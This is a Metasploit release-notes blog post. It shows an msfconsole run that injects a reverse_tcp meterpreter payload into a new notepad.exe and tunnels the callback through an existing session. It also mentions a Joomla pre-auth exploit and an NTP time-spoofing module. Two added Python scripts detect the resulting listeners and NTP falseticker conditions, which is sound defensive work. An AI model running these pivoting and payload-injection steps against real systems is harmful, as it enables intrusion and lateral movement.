Last updated at Fri, 29 Sep 2017 18:42:22 GMT

Aaaaaand we're back! Last week was the first weekly update of the year, and it comes with some super fun stuff.


The latest update allows you to tunnel reverse_tcp sessions over a compromised machine in a slightly less painful way. There is now a new datastore option, ReverseListenerComm, which lets you tell a meterpreter session to tunnel connections back to your payload handler. Here's an example run to give you the idea:

msf exploit(payload_inject) > show options  
Module options (exploit/windows/local/payload_inject):  
   Name        Current Setting  Required  Description  
   ----        ---------------  --------  -----------  
   NEWPROCESS  true             no        New notepad.exe to inject to  
   PID                          no        Process Identifier to inject of process to inject payload.  
   SESSION                      yes       The session to run this module on.   
Payload options (windows/meterpreter/reverse_tcp):  
   Name      Current Setting  Required  Description  
   ----      ---------------  --------  -----------  
   EXITFUNC  process          yes       Exit technique (accepted: , , seh, thread, process, none)  
   LHOST        yes       The listen address  
   LPORT     4444             yes       The listen port  
Exploit target:  
   Id  Name  
   --  ----  
   0   Windows  
msf exploit(payload_inject) > set ReverseListenerComm 1  
ReverseListenerComm => 1  
msf exploit(payload_inject) > set SESSION 1  
SESSION => 1  
msf exploit(payload_inject) > run   
[*] Started reverse handler on via the meterpreter on session 1  
[*] Running module against WIN-2DE8F2QP867  
[*] Launching notepad.exe...  
[*] Preparing 'windows/meterpreter/reverse_tcp' for PID 3092  
[*] Sending stage (884270 bytes)  
[*] Meterpreter session 2 opened ( -> at 2015-05-20 00:09:44 +0100  
meterpreter >  

The really important line there is this:

[*] Started reverse handler on via the meterpreter on session 1

The compromised machine is listening on its localhost for the new connection, but it doesn't have to be localhost: you can tell it to listen on an external address and use psexec against a second internal machine. This used to be possible by creating a route and setting your LHOST to a victim machine's IP address within that route, but it wasn't really clear how to do it and the settings were quite error prone; now it's just a single option to tell Metasploit explicitly where to listen for the payload.
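Seen from the compromised host rather than from msfconsole, the run above leaves two traces: the pivot process now holds a listening socket it never had before, and an injected notepad.exe makes a TCP connection to it. The following is an added example of a host-side check for exactly that, written for this page and not code from the post or from Metasploit. It parses `netstat -ano`-style text plus a PID-to-image map (as you would build from `tasklist`); the sample output, PIDs, image names and the `updater.exe` process hosting the listener are all constructed, and the allow/deny lists are placeholders for site policy.

```python
"""Flag sockets that are anomalous for the process that owns them, from
`netstat -ano` style output plus a PID -> image map. All sample data is
constructed for this example."""
import re
from typing import Dict, List, Set

# Constructed sample in the layout of Windows `netstat -ano` output.
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       856
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:4444           0.0.0.0:0              LISTENING       1840
  TCP    127.0.0.1:4444         127.0.0.1:49731        ESTABLISHED     1840
  TCP    127.0.0.1:49731        127.0.0.1:4444         ESTABLISHED     3092
  UDP    0.0.0.0:123            *:*                                    1104
"""

# Constructed PID -> image map, as built from `tasklist /FO CSV`.
SAMPLE_PIDS: Dict[int, str] = {4: "System", 856: "svchost.exe",
                               1104: "svchost.exe", 1840: "updater.exe",
                               3092: "notepad.exe"}

# Placeholder policy: images allowed to hold listening sockets on this host ...
EXPECTED_LISTENERS: Set[str] = {"System", "svchost.exe", "lsass.exe"}
# ... and images that have no business opening a TCP connection at all.
NEVER_NETWORK: Set[str] = {"notepad.exe", "calc.exe", "mspaint.exe"}

# proto, local, foreign, optional state (UDP rows have none), pid
LINE_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)\s+(?:(\S+)\s+)?(\d+)\s*$")


def parse_netstat(text: str) -> List[dict]:
    """Turn netstat rows into dicts; header and blank lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        proto, local, foreign, state, pid = m.groups()
        rows.append({"proto": proto, "local": local, "foreign": foreign,
                     "state": state or "", "pid": int(pid)})
    return rows


def audit_sockets(netstat_text: str, pid_to_image: Dict[int, str],
                  expected_listeners: Set[str], never_network: Set[str]) -> List[dict]:
    """Return one finding per socket that violates the two policy rules:
    a LISTENING socket owned by an unexpected image, or any TCP socket owned
    by an image that should never touch the network."""
    findings = []
    for row in parse_netstat(netstat_text):
        image = pid_to_image.get(row["pid"], "<unknown>")
        if row["state"] == "LISTENING" and image not in expected_listeners:
            findings.append({"pid": row["pid"], "image": image,
                             "reason": "unexpected listener on " + row["local"]})
        if row["proto"] == "TCP" and image in never_network:
            findings.append({"pid": row["pid"], "image": image,
                             "reason": "TCP socket from non-network image, peer "
                                       + row["foreign"]})
    return findings


if __name__ == "__main__":
    for f in audit_sockets(SAMPLE_NETSTAT, SAMPLE_PIDS, EXPECTED_LISTENERS, NEVER_NETWORK):
        print(f"PID {f['pid']} ({f['image']}): {f['reason']}")
```

On the constructed sample this reports the 0.0.0.0:4444 listener held by `updater.exe` and the loopback connection made by `notepad.exe`; the loopback detail matters because, as the post says, the listener can just as well be bound to an external address, so the rule keys on the owning image rather than on the address.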

Super fun modules


This update comes with a pre-authentication exploit for Joomla, the popular CMS, another in a rich and storied history of deserialization bugs. We've also abstracted some common things into a Joomla mixin, so the next time one of these comes along, writing the exploit will be faster and easier.

Hacking Time

From the module description:

The end goal is to cause ntpd to declare the legitimate peers "false tickers" and choose the attacking clients as the preferred peers, allowing these peers to control time.

Now you, too, can go... NAK to the Future!
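The condition the module description aims for is visible on the target in `ntpq -p` output: the tally character in the first column shows which peers ntpd trusts, with `*` for the system peer, `+` for a candidate and `x` for a peer declared a falseticker. The following added example (written for this page, not code from the post or from Metasploit) parses that output and flags the two things an operator would want paged on: a trusted time source marked `x`, and a system peer that is not on the trusted list. The peer table and the trusted-source set are constructed.

```python
"""Detect ntpd being steered away from its legitimate peers, from `ntpq -p`
output. The peer table and trusted set below are constructed samples."""
from typing import List, Set

# Standard ntpq tally codes (first column of `ntpq -p`).
TALLY = {"*": "sys.peer", "+": "candidate", "x": "falseticker", "-": "outlier",
         ".": "excess", "#": "backup", "o": "pps.peer", " ": "reject"}

# Constructed sample: both real upstreams marked falseticker, an unknown
# source with a ~1 hour offset selected as system peer.
SAMPLE_BAD = """\
     remote           refid      st t when poll reach   delay   offset  jitter
==============================================================================
x10.0.0.5        .GPS.            1 u   17   64  377    0.412   -0.103   0.022
x10.0.0.6        10.0.0.5         2 u   20   64  377    0.530   -0.120   0.031
*192.0.2.40      LOCAL(0)        10 u   12   64  377    1.204  3600.11   0.050
+192.0.2.41      LOCAL(0)        10 u   14   64  377    1.198  3599.98   0.047
"""

# Constructed healthy sample for comparison.
SAMPLE_OK = """\
     remote           refid      st t when poll reach   delay   offset  jitter
==============================================================================
*10.0.0.5        .GPS.            1 u   17   64  377    0.412   -0.103   0.022
+10.0.0.6        10.0.0.5         2 u   20   64  377    0.530   -0.120   0.031
"""

TRUSTED: Set[str] = {"10.0.0.5", "10.0.0.6"}  # placeholder for site's real servers


def parse_ntpq_peers(text: str) -> List[dict]:
    """Parse `ntpq -p` rows; the two header lines are skipped."""
    peers = []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("remote") or line.startswith("="):
            continue
        tally, fields = line[0], line[1:].split()
        if len(fields) < 10:
            continue  # truncated / unexpected row
        peers.append({"tally": tally, "status": TALLY.get(tally, "unknown"),
                      "remote": fields[0], "refid": fields[1],
                      "stratum": int(fields[2]), "offset_ms": float(fields[8])})
    return peers


def check_time_sources(text: str, trusted: Set[str]) -> List[str]:
    """Return a finding for each trusted peer ntpd has rejected as a
    falseticker and for a system peer that is not a trusted source."""
    findings = []
    for p in parse_ntpq_peers(text):
        if p["remote"] in trusted and p["tally"] == "x":
            findings.append(f"trusted peer {p['remote']} marked falseticker")
        if p["tally"] == "*" and p["remote"] not in trusted:
            findings.append(f"system peer {p['remote']} is not a trusted source "
                            f"(offset {p['offset_ms']} ms)")
    return findings


if __name__ == "__main__":
    for msg in check_time_sources(SAMPLE_BAD, TRUSTED):
        print("ALERT:", msg)
```

Run it periodically against the live `ntpq -p` output of the hosts you care about; the healthy table yields no findings, while the steered one yields three. Pairing the tally check with a threshold on the system peer's offset catches the same condition even when the attacker's source is listed among the trusted addresses by mistake.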

Exploit modules

Auxiliary and post modules

As always, you can get all these modules and improvements with a simple msfupdate and the full diff is available on GitHub:  4.11.5-2015121501...4.11.5-2016010401